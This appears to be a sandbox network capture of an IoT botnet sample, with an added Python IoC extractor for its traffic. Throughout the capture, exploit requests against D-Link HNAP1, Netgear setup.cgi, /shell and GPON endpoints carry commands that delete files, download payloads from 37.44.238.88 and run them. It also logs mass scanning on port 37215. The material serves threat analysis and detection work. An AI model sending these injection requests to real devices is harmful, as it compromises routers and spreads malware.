                            Date: Fri, 28 Feb 2025 19:33:43 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Frame-Options: SAMEORIGIN
                            Referrer-Policy: same-origin
                            Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                            Vary: Accept-Encoding
                            Server: cloudflare
                            CF-RAY: 9192d911e8dff668-LHR
                            Content-Encoding: gzip
                          • GET
                            http://4.182.16.236:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra
                            Request
                            GET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
                            User-Agent: masjesu
                            Host: 4.182.16.236:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive
                            Response
                            HTTP/1.1 404 Not Found
                            Date: Fri, 28 Feb 2025 19:33:47 GMT
                            Content-Length: 0
                            Connection: keep-alive
                            Server: Kestrel
                          • POST
                            http://4.182.16.236:80/HNAP1/
                            Request
                            POST /HNAP1/ HTTP/1.0
                            Host: 4.182.16.236:80
                            Content-Type: text/xml; charset="utf-8"
                            SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
                            Content-Length: 640
                          • GET
                            http://4.182.16.236:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
                            Request
                            GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Response
                            HTTP/1.1 400 Bad Request
                            Date: Fri, 28 Feb 2025 19:33:47 GMT
                            Content-Length: 0
                            Connection: close
                            Server: Kestrel
                          • POST
                            http://127.0.0.1:80/GponForm/diag_Form?images/
                            Request
                            POST /GponForm/diag_Form?images/ HTTP/1.1
                            Host: 127.0.0.1:80
                            Connection: keep-alive
                            Accept-Encoding: gzip, deflate
                            Accept: */*
                            User-Agent: masjesu
                            Content-Length: 118
                            Response
                            HTTP/1.1 404 Not Found
                            Date: Fri, 28 Feb 2025 19:33:47 GMT
                            Content-Length: 0
                            Connection: keep-alive
                            Server: Kestrel
                          • DNS
                            Response
                            HTTP/1.1 400 Bad Request
                            Server: nginx
                            Date: Fri, 28 Feb 2025 19:33:47 GMT
                            Content-Type: text/html
                            Content-Length: 150
                            Connection: close
                          • GET
                            http://37.202.169.166:8080/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
                            Request
                            GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Response
                            HTTP/1.1 404 Not Found
                            CONNECTION: close
                            CONTENT-LENGTH: 48
                            Strict-Transport-Security: max-age=604800; includeSubDomains
                            X-XSS-Protection: 1;mode=block
                            Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval'
                            X-Content-Type-Options: nosniff
                            CONTENT-TYPE: text/html
                          • POST
                            http://127.0.0.1:8080/GponForm/diag_Form?images/
                            Request
                            POST /GponForm/diag_Form?images/ HTTP/1.1
                            Host: 127.0.0.1:8080
                            Connection: keep-alive
                            Accept-Encoding: gzip, deflate
                            Accept: */*
                            User-Agent: masjesu
                            Content-Length: 118
                          • GET
                            http://104.130.219.14:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra
                            Request
                            GET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
                            User-Agent: masjesu
                            Host: 104.130.219.14:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive
                            Response
                            HTTP/1.1 302 Found
                            Date: Fri, 28 Feb 2025 19:34:01 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            X-Frame-Options: SAMEORIGIN
                            X-Content-Type-Options: nosniff
                            Location: https://www.astarna.com/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra
                            Content-Length: 371
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=iso-8859-1
                          • POST
                            http://104.130.219.14:80/HNAP1/
                            Request
                            POST /HNAP1/ HTTP/1.0
                            Host: 104.130.219.14:80
                            Content-Type: text/xml; charset="utf-8"
                            SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
                            Content-Length: 640
                            Response
                            HTTP/1.1 400 Bad Request
                            Date: Fri, 28 Feb 2025 19:34:01 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            X-Frame-Options: SAMEORIGIN
                            X-Content-Type-Options: nosniff
                            X-Frame-Options: SAMEORIGIN
                            X-Content-Type-Options: nosniff
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                          • GET
                            http://104.130.219.14:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
                            Request
                            GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Response
                            HTTP/1.1 302 Found
                            Date: Fri, 28 Feb 2025 19:34:01 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            X-Frame-Options: SAMEORIGIN
                            X-Content-Type-Options: nosniff
                            Location: https://www.astarna.com/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
                            Content-Length: 447
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                          • POST
                            http://127.0.0.1:80/GponForm/diag_Form?images/
                            Request
                            POST /GponForm/diag_Form?images/ HTTP/1.1
                            Host: 127.0.0.1:80
                            Connection: keep-alive
                            Accept-Encoding: gzip, deflate
                            Accept: */*
                            User-Agent: masjesu
                            Content-Length: 118
                            Response
                            HTTP/1.1 302 Found
                            Date: Fri, 28 Feb 2025 19:34:03 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            X-Frame-Options: SAMEORIGIN
                            X-Content-Type-Options: nosniff
                            Location: https://www.astarna.com/GponForm/diag_Form?images/
                            Content-Length: 309
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=iso-8859-1
                          • GET
                            http://23.0.152.238:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra
                            Request
                            GET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
                            User-Agent: masjesu
                            Host: 23.0.152.238:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive
                            Response
                            HTTP/1.0 400 Bad Request
                            Server: AkamaiGHost
                            Mime-Version: 1.0
                            Content-Type: text/html
                            Content-Length: 312
                            Expires: Fri, 28 Feb 2025 19:34:11 GMT
                            Date: Fri, 28 Feb 2025 19:34:11 GMT
                            Connection: close
                          • POST
                            http://23.0.152.238:80/HNAP1/
                            Request
                            POST /HNAP1/ HTTP/1.0
                            Host: 23.0.152.238:80
                            Content-Type: text/xml; charset="utf-8"
                            SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
                            Content-Length: 640
                            Response
                            HTTP/1.0 400 Bad Request
                            Server: AkamaiGHost
                            Mime-Version: 1.0
                            Content-Type: text/html
                            Content-Length: 351
                            Expires: Fri, 28 Feb 2025 19:34:11 GMT
                            Date: Fri, 28 Feb 2025 19:34:11 GMT
                            Connection: close
                          • GET
                            http://23.0.152.238:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
                            Request
                            GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Response
                            HTTP/1.0 400 Bad Request
                            Server: AkamaiGHost
                            Mime-Version: 1.0
                            Content-Type: text/html
                            Content-Length: 310
                            Expires: Fri, 28 Feb 2025 19:34:11 GMT
                            Date: Fri, 28 Feb 2025 19:34:11 GMT
                            Connection: close
                          • POST
                            http://127.0.0.1:80/GponForm/diag_Form?images/
                            Request
                            POST /GponForm/diag_Form?images/ HTTP/1.1
                            Host: 127.0.0.1:80
                            Connection: keep-alive
                            Accept-Encoding: gzip, deflate
                            Accept: */*
                            User-Agent: masjesu
                            Content-Length: 118
                            Response
                            HTTP/1.0 400 Bad Request
                            Server: AkamaiGHost
                            Mime-Version: 1.0
                            Content-Type: text/html
                            Content-Length: 310
                            Expires: Fri, 28 Feb 2025 19:34:11 GMT
                            Date: Fri, 28 Feb 2025 19:34:11 GMT
                            Connection: close
                          • GET
                            Accept: */*
                            User-Agent: masjesu
                            Content-Length: 118
                          • GET
                            http://167.71.139.23:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
                            Request
                            GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                          • GET
                            http://201.222.102.254:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra
                            Request
                            GET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
                            User-Agent: masjesu
                            Host: 201.222.102.254:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive
                            Response
                            HTTP/1.1 404 Not Found
                            Cache-Control: no-store
                            Connection: Keep-Alive
                            Content-Length: 99
                            Content-Type: text/html
                            Date: Fri, 28 Feb 2025 19:35:12 GMT
                            Expires: 0
                            Pragma: no-cache
                            X-Frame-Options: sameorigin
                          • POST
                            http://127.0.0.1:80/GponForm/diag_Form?images/
                            Request
                            POST /GponForm/diag_Form?images/ HTTP/1.1
                            Host: 127.0.0.1:80
                            Connection: keep-alive
                            Accept-Encoding: gzip, deflate
                            Accept: */*
                            User-Agent: masjesu
                            Content-Length: 118
                            Response
                            HTTP/1.1 501 Not Implemented
                            Cache-Control: no-store
                            Connection: close
                            Content-Length: 111
                            Content-Type: text/html
                            Date: Fri, 28 Feb 2025 19:35:12 GMT
                            Expires: 0
                            Pragma: no-cache
                            X-Frame-Options: sameorigin
                          • DNS
                            Response
                            (null) 400 Bad Request
                            Server: mini_httpd/1.19/bhoc 23sep2004
                            Date: Mon, 16 Feb 1970 06:13:51 GMT
                            Cache-Control: no-cache,no-store
                            Content-Type: text/html; charset=UTF-8
                            Connection: close
                          • POST
                            http://83.253.41.12:80/HNAP1/
                            Request
                            POST /HNAP1/ HTTP/1.0
                            Host: 83.253.41.12:80
                            Content-Type: text/xml; charset="utf-8"
                            SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
                            Content-Length: 640
                            Response
                            HTTP/1.0 404 Not Found
                            Server: mini_httpd/1.19/bhoc 23sep2004
                            Date: Mon, 16 Feb 1970 06:13:52 GMT
                            Cache-Control: no-cache,no-store
                            Content-Type: text/html; charset=UTF-8
                            Connection: close
                          • GET
                            http://83.253.41.12:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra
                            Request
                            GET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
                            User-Agent: masjesu
                            Host: 83.253.41.12:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive
                            Response
                            HTTP/1.1 404 Not Found
                            Server: mini_httpd/1.19/bhoc 23sep2004
                            Date: Mon, 16 Feb 1970 06:13:51 GMT
                            Cache-Control: no-cache,no-store
                            Content-Type: text/html; charset=UTF-8
                            Connection: close
                          • GET
                            http://83.253.41.12:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
                            Request
                            GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Response
                            HTTP/1.0 404 Not Found
                            Server: mini_httpd/1.19/bhoc 23sep2004
                            Date: Mon, 16 Feb 1970 06:13:51 GMT
                            Cache-Control: no-cache,no-store
                            Content-Type: text/html; charset=UTF-8
                            Connection: close
                          • POST
                            http://127.0.0.1:80/GponForm/diag_Form?images/
                            Request
                            POST /GponForm/diag_Form?images/ HTTP/1.1
                            Host: 127.0.0.1:80
                            Connection: keep-alive
                            Accept-Encoding: gzip, deflate
                            Accept: */*
                            User-Agent: masjesu
                            Content-Length: 118
                            Response
                            HTTP/1.1 400 Bad Request
                            Server: mini_httpd/1.19/bhoc 23sep2004
                            Date: Mon, 16 Feb 1970 06:13:52 GMT
                            Cache-Control: no-cache,no-store
                            Content-Type: text/html; charset=UTF-8
                            Connection: close
                          • POST
                            http://127.0.0.1:80/GponForm/diag_Form?images/
                            Request
                            POST /GponForm/diag_Form?images/ HTTP/1.1
                            Host: 127.0.0.1:80
                            Connection: keep-alive
                            Accept-Encoding: gzip, deflate
                            Accept: */*
                            User-Agent: masjesu
                            Content-Length: 118
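The request shapes captured above are command-injection attempts aimed at different router families: the HNAP1 POST carries a backtick-quoted shell command inside the SOAPAction header (the HNAP interface of D-Link routers), the setup.cgi GET passes it through the Netgear todo=syscmd&cmd= parameter, the /shell? GET hands the whole query string to a shell, and the GponForm/diag_Form POST (GPON ONT routers) keeps its payload in a 118-byte body that the capture does not show. Each visible command fetches a stage from 37.44.238.88 and runs it. The script below is an added example, not part of the sandbox report: it parses those captured requests, recovers the injected command from whichever carrier holds it, and pulls the payload URLs out as IoCs. The sample requests are copied from the capture; the GPON entry is classified but yields no command because its body is not on the page, and nothing is guessed for it.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Request lines and headers copied from the capture above (constructed sample input; the GPON
# POST body is not in the capture, so it is deliberately absent here too).
SAMPLE_REQUESTS = [
    "POST /HNAP1/ HTTP/1.0\r\nHost: 167.71.139.23:80\r\nContent-Type: text/xml; charset=\"utf-8\"\r\n"
    "SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;"
    "rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;"
    "/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`\r\nContent-Length: 640\r\n",
    "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim"
    "+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0\r\n",
    "GET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1\r\n"
    "User-Agent: masjesu\r\nHost: 167.71.139.23:80\r\n",
    "POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: 127.0.0.1:80\r\nUser-Agent: masjesu\r\n"
    "Content-Length: 118\r\n",
]

URL_RE = re.compile(r"https?://[^\s;`'\"|&<>]+")
BACKTICK_RE = re.compile(r"`([^`]*)`")


def parse_request(raw):
    """Split a raw request into (method, target, headers); header names are lower-cased."""
    lines = raw.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def query_params(query):
    """Decode key=value pairs split on '&' only. parse_qs is avoided on purpose: older Pythons
    also split on ';', which would chop the injected command into pieces."""
    params = {}
    for part in query.split("&"):
        key, _, value = part.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def classify(target, headers):
    """Map a request to the exploit pattern seen in the capture, by path and payload carrier."""
    path = urlsplit(target).path
    if path == "/HNAP1/" and BACKTICK_RE.search(headers.get("soapaction", "")):
        return "hnap1-soapaction-injection"
    if path == "/setup.cgi" and "todo=syscmd" in target:
        return "netgear-setup.cgi-syscmd"
    if path == "/shell":
        return "shell-query-command"
    if path == "/GponForm/diag_Form":
        return "gpon-diag_form"
    return "unclassified"


def injected_command(kind, target, headers):
    """Recover the shell command the request tries to run, or None when it is not in the capture."""
    query = urlsplit(target).query
    if kind == "hnap1-soapaction-injection":
        return BACKTICK_RE.search(headers["soapaction"]).group(1)
    if kind == "netgear-setup.cgi-syscmd":
        return query_params(query).get("cmd")
    if kind == "shell-query-command":
        return unquote_plus(query)
    return None


def analyse(raw):
    """One record per request: pattern, decoded command and every payload URL inside it."""
    method, target, headers = parse_request(raw)
    kind = classify(target, headers)
    command = injected_command(kind, target, headers)
    urls = URL_RE.findall(command) if command else []
    return {"method": method, "target": target, "kind": kind,
            "command": command, "payload_urls": urls}


def extract_iocs(raws):
    """Distinct payload hosts and file names across all captured requests."""
    hosts, files = set(), set()
    for raw in raws:
        for url in analyse(raw)["payload_urls"]:
            parts = urlsplit(url)
            hosts.add(parts.hostname)
            files.add(parts.path.rsplit("/", 1)[-1])
    return sorted(hosts), sorted(files)


if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        info = analyse(raw)
        print(info["kind"], "->", info["command"])
    print(extract_iocs(SAMPLE_REQUESTS))
```

Matching on the carrier rather than on one specific command keeps the extractor useful when the operator rotates payload names or hosts: a backtick in a SOAPAction header, todo=syscmd on setup.cgi, or a wget/curl inside a /shell? query are the stable parts, and the same three checks are what a network signature for this traffic should key on.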
                          • 37.44.238.88:80
                            http://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
                            http
                            3.3kB
                            114.4kB
                            57
                            85

                            HTTP Request

                            GET http://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G

                            HTTP Response

                            200
                          • 37.44.238.88:80
                            http://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
                            http
                            3.6kB
                            114.4kB
                            66
                            85

                            HTTP Request

                            GET http://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G

                            HTTP Response

                            200
                          • 37.44.238.88:80
                            http://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
                            http
                            918 B
                            25.3kB
                            18
                            20

                            HTTP Request

                            GET http://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G

                            HTTP Response

                            200
                          • 37.44.238.88:80
                            http://conn.masjesu.zip/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
                            http
                            3.9kB
                            126.0kB
                            67
                            94

                            HTTP Request

                            GET http://conn.masjesu.zip/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv

                            HTTP Response

                            200
                          • 216.126.231.240:80
                            conn.masjesu.zip
                            60 B
                            1
                          • 37.44.238.88:80
                            http://conn.masjesu.zip/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
                            http
                            3.7kB
                            126.0kB
                            69
                            94

                            HTTP Request

                            GET http://conn.masjesu.zip/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv

                            HTTP Response

                            200
                          • 216.126.231.240:80
                            conn.masjesu.zip
                            180 B
                            3
                          • 37.44.238.88:80
                            http://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
                            http
                            3.2kB
                            106.0kB
                            58
                            78

                            HTTP Request

                            GET http://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E

                            HTTP Response

                            200
                          • 216.126.231.240:80
                            conn.masjesu.zip
                            180 B
                            3
                          • 37.44.238.88:80
                            http://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
                            http
                            3.3kB
                            106.0kB
                            58
                            78

                            HTTP Request

                            GET http://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E

                            HTTP Response

                            200
                          • 37.44.238.88:80
                            http://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
                            http
                            810 B
                            22.5kB
                            15
                            18

                            HTTP Request

                            GET http://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E

                            HTTP Response

                            200
                          • 37.44.238.88:80
                            http://conn.masjesu.zip/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
                            http
                            3.8kB
                            119.2kB
                            70
                            89

                            HTTP Request

                            GET http://conn.masjesu.zip/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki

                            HTTP Response

                            200
                          • 37.44.238.88:80
                            http://conn.masjesu.zip/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
                            http
                            3.4kB
                            119.2kB
                            63
                            89

                            HTTP Request

                            GET http://conn.masjesu.zip/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki

                            HTTP Response

                            200
                          • 216.126.231.240:80
                            conn.masjesu.zip
                            120 B
                            2
                          • 216.126.231.240:80
                            conn.masjesu.zip
                            180 B
                            3
                          • 37.44.238.88:80
                            http://conn.masjesu.zip/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
                            http
                            4.4kB
                            150.9kB
                            80
                            111

                            HTTP Request

                            GET http://conn.masjesu.zip/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr

                            HTTP Response

                            200
                          • 37.44.238.88:80
                            http://conn.masjesu.zip/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
                            http
                            4.4kB
                            150.9kB
                            82
                            111

                            HTTP Request

                            GET http://conn.masjesu.zip/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr

                            HTTP Response

                            200
                          • 216.126.231.240:80
                            conn.masjesu.zip
                            240 B
                            4
                          • 37.44.238.88:443
                            conn.masjesu.zip
                            https
                            1.2kB
                            2.0kB
                            14
                            13
                          • 37.44.238.88:80
                            http://37.44.238.88/.shell
                            http
                            331 B
                            845 B
                            5
                            5

                            HTTP Request

                            GET http://37.44.238.88/.shell

                            HTTP Response

                            200
                          • 216.126.231.240:80
                            conn.masjesu.zip
                            240 B
                            4
                          • 166.142.198.85:37215
                            60 B
                            1
                          • 106.250.89.44:37215
                            60 B
                            1
                          • 46.93.13.38:37215
                            60 B
                            1
                          • 19.25.236.3:37215
                            60 B
                            1
                          • 78.15.23.103:37215
                            60 B
                            1
                          • 135.212.236.38:37215
                            60 B
                            1
                          • 50.133.252.105:37215
                            60 B
                            1
                          • 178.163.141.187:37215
                            60 B
                            1
                          • 2.109.137.5:37215
                            60 B
                            1
                          • 95.10.38.55:37215
                            60 B
                            40 B
                            1
                            1
                          • 47.39.109.18:37215
                            60 B
                            1
                          • 194.110.158.139:37215
                            60 B
                            1
                          • 39.87.59.141:37215
                            60 B
                            1
                          • 194.43.195.3:37215
                            60 B
                            1
                          • 66.99.206.69:37215
                            60 B
                            1
                          • 187.69.206.158:37215
                            60 B
                            1
                          • 184.125.55.80:37215
                            60 B
                            1
                          • 195.252.142.195:37215
                            60 B
                            1
                          • 5.91.206.177:37215
                            60 B
                            1
                          • 217.65.185.55:37215
                            60 B
                            1
                          • 38.113.183.180:37215
                            60 B
                            1
                          • 210.54.47.138:37215
                            60 B
                            1
                          • 86.163.72.46:37215
                            60 B
                            1
                          • 172.142.38.1:37215
                            60 B
                            1
                          • 222.160.215.59:37215
                            60 B
                            1
                          • 168.169.252.220:37215
                            60 B
                            1
                          • 82.16.250.149:37215
                            60 B
                            1
                          • 193.65.73.145:37215
                            60 B
                            40 B
                            1
                            1
                          • 117.253.17.211:37215
                            60 B
                            40 B
                            1
                            1
                          • 156.68.16.88:37215
                            60 B
                            1
                          • 156.112.147.223:37215
                            60 B
                            1
                          • 92.170.160.69:37215
                            60 B
                            1
                          • 110.39.68.245:37215
                            60 B
                            1
                          • 103.212.1.46:37215
                            60 B
                            1
                          • 154.132.185.231:37215
                            60 B
                            1
                          • 165.219.144.167:37215
                            60 B
                            1
                          • 86.13.197.51:37215
                            60 B
                            1
                          • 210.1.181.166:37215
                            60 B
                            1
                          • 92.152.239.230:37215
                            60 B
                            1
                          • 95.118.50.109:37215
                            60 B
                            1
                          • 15.173.85.192:37215
                            60 B
                            1
                          • 129.242.194.225:37215
                            60 B
                            1
                          • 53.97.109.235:37215
                            60 B
                            1
                          • 67.49.1.118:37215
                            60 B
                            1
                          • 51.140.6.111:37215
                            60 B
                            1
                          • 9.54.242.108:37215
                            60 B
                            1
                          • 135.76.4.133:37215
                            60 B
                            1
                          • 176.33.178.212:37215
                            60 B
                            1
                          • 106.134.50.144:37215
                            60 B
                            1
                          • 102.3.17.51:37215
                            60 B
                            1
                          • 66.20.130.87:37215
                            60 B
                            1
                          • 187.120.151.103:37215
                            60 B
                            1
                          • 17.157.86.26:37215
                            60 B
                            1
                          • 31.28.30.190:37215
                            60 B
                            1
                          • 145.139.81.26:37215
                            60 B
                            1
                          • 110.160.239.70:37215
                            60 B
                            1
                          • 77.151.13.216:37215
                            60 B
                            1
                          • 104.24.157.51:37215
                            60 B
                            1
                          • 133.10.56.246:37215
                            60 B
                            1
                          • 168.51.0.167:37215
                            60 B
                            1
                          • 87.213.252.177:37215
                            60 B
                            1
                          • 8.186.46.133:37215
                            60 B
                            1
                          • 58.220.36.149:37215
                            60 B
                            1
                          • 31.198.162.75:37215
                            60 B
                            1
                          • 196.3.78.240:37215
                            60 B
                            1
                          • 58.163.242.92:37215
                            60 B
                            1
                          • 35.171.114.87:37215
                            60 B
                            1
                          • 45.239.182.232:37215
                            60 B
                            1
                          • 48.41.155.249:37215
                            60 B
                            1
                          • 165.48.101.200:37215
                            60 B
                            1
                          • 121.230.31.182:37215
                            60 B
                            1
                          • 14.114.5.25:37215
                            60 B
                            1
                          • 193.52.3.154:37215
                            60 B
                            1
                          • 200.191.88.44:37215
                            60 B
                            1
                          • 111.83.214.113:37215
                            60 B
                            1
                          • 39.242.70.203:37215
                            60 B
                            1
                          • 106.61.201.193:37215
                            60 B
                            1
                          • 59.223.217.17:37215
                            60 B
                            1
                          • 86.114.128.103:37215
                            60 B
                            1
                          • 31.238.67.222:37215
                            60 B
                            1
                          • 95.10.38.55:80
                            60 B
                            1
                          • 193.65.73.145:80
                            60 B
                            40 B
                            1
                            1
                          • 193.65.73.145:81
                            60 B
                            40 B
                            1
                            1
                          • 117.253.17.211:80
                            60 B
                            1
                          • 67.49.1.118:80
                            60 B
                            1
                          • 193.65.73.145:8080
                            60 B
                            40 B
                            1
                            1
                          • 193.65.73.145:52869
                            60 B
                            40 B
                            1
                            1
                          • 67.49.1.118:81
                            60 B
                            1
                          • 193.65.73.145:7574
                            60 B
                            40 B
                            1
                            1
                          • 193.65.73.145:5555
                            60 B
                            40 B
                            1
                            1
                          • 187.69.206.158:80
                            60 B
                            1
                          • 39.87.59.141:80
                            60 B
                            1
                          • 210.54.47.138:80
                            60 B
                            1
                          • 156.68.16.88:80
                            60 B
                            1
                          • 47.39.109.18:80
                            60 B
                            1
                          • 195.252.142.195:80
                            60 B
                            1
                          • 46.93.13.38:80
